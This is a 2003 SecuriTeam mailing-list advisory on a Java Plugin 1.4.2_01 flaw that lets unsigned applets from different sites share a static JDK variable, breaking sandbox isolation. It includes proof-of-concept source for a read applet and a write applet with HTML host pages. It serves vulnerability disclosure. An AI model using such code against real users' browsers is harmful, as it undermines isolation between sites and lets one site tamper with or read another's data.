[NEWS] Cross-Site Java breaks Sandbox Isolation for Unsigned Applets
From: SecuriTeam (support_at_securiteam.com)
Date: 10/23/03
- Previous message: SecuriTeam: "[NEWS] Apache Cocoon Directory Traversal Vulnerability"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 23 Oct 2003 18:10:38 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Cross-Site Java breaks Sandbox Isolation for Unsigned Applets
------------------------------------------------------------------------
SUMMARY
Unsigned applets coming from different sites may share data areas via
undocumented static variables of the JDK. While altering these variables,
JDK's internal states may become corrupt, making JDK not function
properly. This especially concerns XML processing which depends on the
org.apache.xalan.processor.XSLProcessorVersion class. This behavior
violates the isolation restriction of the sandbox.
DETAILS
Vulnerable systems:
* Java Plugin version 1.4.2_01
Reproduction:
Two applets,
- one on siteA: www.siteA.org => Read.html / ReadApplet.class
- one on siteB: www.siteB.org => Write.html / WriteApplet.class
Applet from siteB can share a variable also accessible (read and write)
which is used by siteA. So data protection is not guaranteed, an unsigned
applet may grab data stored in this variable by a signed applet or
interfere its XML processing and therefore violates the isolation
restriction of the sandbox.
==========READAPPLET=========================
/* Illegalaccess.org java exploit */
/* coded by Marc Schoenefeld */
import java.awt.Graphics;
public class ReadApplet extends java.applet.Applet {
public void paint(Graphics g)
{
System.out.println(org.apache.xalan.processor.XSLProcessorVersion.S_VERSION);
}
static {
System.out.println(org.apache.xalan.processor.XSLProcessorVersion.S_VERSION);
}}
==========READAPPLET=========================
==========WRITEAPPLET=========================
import java.awt.Graphics;
public class WriteApplet extends java.applet.Applet {
public void paint(Graphics g)
{
org.apache.xalan.processor.XSLProcessorVersion.S_VERSION += "a";
}
static {
org.apache.xalan.processor.XSLProcessorVersion.S_VERSION = "altered
from
SiteA";
}
}
==========WRITEAPPLET=========================
=========Write.html============================
< HTML>
< BODY BGCOLOR=#66FF66>
< PRE>
WriteApplet, write to variable
Marc (marc@org.illegalaccess)
</PRE>
< applet codebase=. code=WriteApplet.class width=100 height=100>
</applet>
</BODY>
</HTML>
========Read.html=============================
< HTML>
< BODY BGCOLOR=#6666FF>
< PRE>
ReadApplet, read from variable
Marc (marc@org.illegalaccess)
</PRE>
< applet codebase=. code=ReadApplet.class width=100 height=100>
</applet>
</BODY>
</HTML>
ADDITIONAL INFORMATION
The information has been provided by <mailto:marc@illegalaccess.org> Marc
Schoenefeld.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[NEWS] Apache Cocoon Directory Traversal Vulnerability"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
- [NT] Lotus Notes Multiple Java Applet Vulnerabilities
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... Lotus Notes Multiple Java Applet
Vulnerabilities ... with the desired URL when an e-mail message is viewed. ...
(Securiteam) - [NT] Details of Lotus Notes Java Applet vulnerabilities
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... Details of Lotus Notes Java
Applet vulnerabilities ... with the desired URL when an e-mail message is viewed. ...
(Securiteam) - [EXPL] Security vulnerability in SUNs Java Virtual Machine Implementation (Test)
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... Vulnerability in SUN's
Java Virtual Machine Implementation ('/' Replaces ... The following applet tests for this
vulnerability: ... In no event shall we be liable for any damages whatsoever including
direct, indirect, incidental, consequential, loss of business profits or special damages. ...
(Securiteam) - [NT] Cross Application Scripting in Trend Micros Antivirus Software
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... The SecuriTeam alerts
list - Free, Accurate, Independent. ... When the product alerts the user of a possible virus,
it creates an HTML ... (Securiteam) - [NT] Microsoft Windows NTFS Improper Handler Closing
... The following security advisory is sent to the securiteam mailing list, and
can be found at the SecuriTeam web site: http://www.securiteam.com ... from a system
shutdown, uninitialized data may be visible in files from ... (Securiteam)
